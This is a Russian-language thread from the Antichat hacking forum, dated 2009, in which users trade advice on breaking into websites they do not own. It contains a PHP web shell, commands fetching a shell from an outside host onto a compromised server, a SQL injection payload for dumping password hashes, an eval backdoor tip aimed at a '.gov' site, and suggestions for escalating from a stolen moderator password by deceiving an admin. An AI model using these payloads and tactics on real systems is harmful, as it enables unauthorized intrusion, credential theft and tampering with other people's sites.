Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.02.2009, 06:48
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от downloader
есть пару вапросов:
1) вот я залил один файл в каторым ноходица
Код:
<? system($_GET[c]) ?>
я пробавал залить шелл через этот варянт таким путём:
Код:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
но не залился...  может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???
2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:
Код:
$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");
делаю запрос на том сайте:
Код:
reqreset.php?requestid=-1'+union+select+passhash+from+users+--+
передомной ошибка в sql:
Код:
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1
помойму тамо сидит фильтр на кавачикй... Не делай никогда system() - это нерациоанально,
делай eval(). system() не всегда работает и если magic quotes on -то ничего ты не сделаешь....
А eval дает гибкость большую - твой код всегда выполинться даже при magic quotes on (правда с финтами некоторыми =) ) Кроме того, всегда можно сделать и так -если хочешь - eval('system();')
в твоем случае делай так - залий аплоадер простенький - <?php eval($_GET[id]);?> и потом юзай так
site.gov/cmd.php?id=copy('http://xakersite.ru/shell.txt','shell.php');
|
|
|
13.02.2009, 09:57
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
попугай тама magic_quotes_on я бы залил с радастю снова  но больше нету допуска залить... через system и с magic_quotes_on никак нельзя залить шелл? или может скачать все файлы?
|
|
|
|
13.02.2009, 12:37
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
там *nix?
Если да, то почитай конфиги и где то должна быть админка, етс...
напомню:
ls (ls -lia) --листинг диры
pwd ---текущая дира
cat file.php --открыть файл для просмотра (если не катит так, смотри ниже)
cp file.php file.txt ---ну и потом прям в браузере смотрим сорцы
rm file -- удалить файл (например мещающий хтакцесс)
этих команд, в купе с твоим <? system($_GET[c]) ?> , хватит в 90% случаев.
|
|
|
|
13.02.2009, 13:55
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
тама FreeBSD
|
|
|
|
13.02.2009, 13:58
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
фрибсд это никс система
|
|
|
|
13.02.2009, 19:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
запрос не правильно составляешь либо прав не хватает
|
|
|
|
13.02.2009, 20:16
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от RazyKK
Залил шелл на серв,нашел login pass к БД ,подключился к бд и если чтонить изменяю в бд то изменения не сохраняются,в чем может быть проблема?
mysql?
http://www.mysql.ru/docs/man/mysql_change_user.html
|
|
|
|
13.02.2009, 20:24
|
|
Новичок
Регистрация: 18.01.2009
Сообщений: 12
Провел на форуме:
190734
Репутация:
41
|
|
Помогите с сайтом ucoz!
Я заполучил пароль моддера ,можно ли с помошью этого получить пасс админа?
|
|
|
|
13.02.2009, 20:37
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от SeCriVe
Помогите с сайтом ucoz!
Я заполучил пароль моддера ,можно ли с помошью этого получить пасс админа?
попробуй нагрей админа, он модеру возможно доверяет 
|
|
|
|
13.02.2009, 20:56
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Возможно у того узера от которого у тебя есть пасс не хватает грантов на изменения даных в той таблицы(базе) в которой ты хочешь внести изменинея.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
